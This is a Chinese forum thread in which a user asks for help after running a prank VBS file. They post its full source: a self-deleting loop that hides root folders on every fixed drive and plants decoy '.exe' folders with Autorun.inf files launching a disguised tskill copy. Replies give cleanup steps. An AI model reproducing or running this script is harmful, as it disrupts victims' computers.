一个vbs整人代码,电脑半瘫痪了,求救啊~~

芥末的呆毛 2016-03-01 06:30:46
朋友整我给我发了个vbs文件,双击后文件自动消失了,然后就跟中病毒一样了,vbs里面的代码是
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set Cx=fso.GetSpecialFolder(0)
fso.GetFile(WScript.ScriptFullName).Delete(True)
Do
C=fso.GetParentFolderName(Cx)
Set Fdrs=fso.GetFolder(C).SubFolders

For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
fso.CreateFolder(C & Fdr.Name & ".exe")
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Attributes=6
fun.Copy(C & Fdr.Name & ".exe\fun.xls.exe")
Set auto=fso.CreateTextFile(C & Fdr.Name & ".exe\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
fso.GetFolder(C & Fdr.Name & ".exe").Attributes=Fdr.Attributes
Fdr.Attributes=6
End If
Next

Set Cx=Nothing
Set Fdrs=Nothing

Set drvs=fso.Drives
For Each drv In drvs
If drv.DriveType=2 Then
If drv & "\" = C Then
Else
Set Fdrs=fso.GetFolder(drv).SubFolders

For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
Fdr.Name=Fdr.name & ".exe"
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Copy(drv & "\" & Fdr.Name & "\fun.xls.exe")
Set auto=fso.CreateTextFile(drv & "\" & Fdr.Name & "\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
End If
Next

End If
End If
Next
WScript.Sleep 60*1000
Loop


求大神帮帮我啊!!!
...全文
11172 14 打赏 收藏 转发到动态 举报
写回复
用AI写文章
14 条回复
切换为时间正序
请发表友善的回复…
发表回复
weixin_43981575 2019-09-17
  • 打赏
  • 举报
回复
6666666
qq_44883168 2019-04-07
  • 打赏
  • 举报
回复
这个运行了之后有些软件就不能卸载了 说找不到什么的
allites 2016-06-28
  • 打赏
  • 举报
回复
一个个改就好
一笑拔剑 2016-03-15
  • 打赏
  • 举报
回复
u盘启动 重装系统 这个难度应该是不高的 就是恶作剧而已
不正经的运维 2016-03-06
  • 打赏
  • 举报
回复
有整人代码去把电脑搞瘫痪还不如黑掉那台电脑
vansoft 2016-03-04
  • 打赏
  • 举报
回复
PE进系统,把VBS脚本改一下,修复。
舉杯邀明月 2016-03-03
  • 打赏
  • 举报
回复
引用 6 楼 sysdzw 的回复:
[quote=引用 4 楼 Chen8013 的回复:] [quote=引用 3 楼 sysdzw 的回复:] 果然有tskill,还没用过。 话说这什么人啊,这几乎是毁灭性的。
我试了一下,除了难看之外,没有别的后果啊。 [/quote]不敢试,看起来目录名都变了,如果system32和windows文件夹下面都被改名了难道系统不会出问题么。[/quote] 它只改了根目录下的,就这一层。 system32和windows是“在使用中”的,也没办法改呀。
赵4老师 2016-03-03
  • 打赏
  • 举报
回复
作为一个受虐狂,一看见什么整人代码,还不赶紧爱之初体验?
舉杯邀明月 2016-03-02
  • 打赏
  • 举报
回复
tskill.exe 不加参数,运行了也没什么作用的。
舉杯邀明月 2016-03-02
  • 打赏
  • 举报
回复
引用 3 楼 sysdzw 的回复:
果然有tskill,还没用过。 话说这什么人啊,这几乎是毁灭性的。
我试了一下,除了难看之外,没有别的后果啊。
舉杯邀明月 2016-03-02
  • 打赏
  • 举报
回复
这个,好像还没什么十分严重的问题。 你的计算机应该早就关机或重启过了,现在并没有影响你的系统运行吧。只是看起来别扭。 解决方法也不是很难。 第一步: “文件夹和搜索选项”→“查看” 选项卡设置:   把“隐藏受保护的操作系统文件(推荐)”的钩钩去掉。   “隐藏文件和文件夹” 那儿选择 显示隐藏的文件、文件夹和驱动器。 第二步:   系统盘:直接把根目录下的那些带 .exe 的文件夹删除。   其它分区:把根目录下那些带 .exe 的目录名,去掉 .exe;对应目录内的 Autorun.inf和fun.xls.exe直接删除。     删除这两个文件名的文件,可以用搜索的方式,直接一起删除。    第三步: 上面那些处理过的文件夹,按你的需要,看看是否把它们的“系统、隐藏”属性去掉。   这个可能只有用命令行来操作,或写批处理、vbs脚本等来处理。
无·法 2016-03-02
  • 打赏
  • 举报
回复
果然有tskill,还没用过。 话说这什么人啊,这几乎是毁灭性的。
无·法 2016-03-02
  • 打赏
  • 举报
回复
你电脑里哪里来的tskill.exe?
无·法 2016-03-02
  • 打赏
  • 举报
回复
引用 4 楼 Chen8013 的回复:
[quote=引用 3 楼 sysdzw 的回复:] 果然有tskill,还没用过。 话说这什么人啊,这几乎是毁灭性的。
我试了一下,除了难看之外,没有别的后果啊。 [/quote]不敢试,看起来目录名都变了,如果system32和windows文件夹下面都被改名了难道系统不会出问题么。

7,757

社区成员

发帖
与我相关
我的任务
社区描述
VB 基础类
社区管理员
  • VB基础类社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧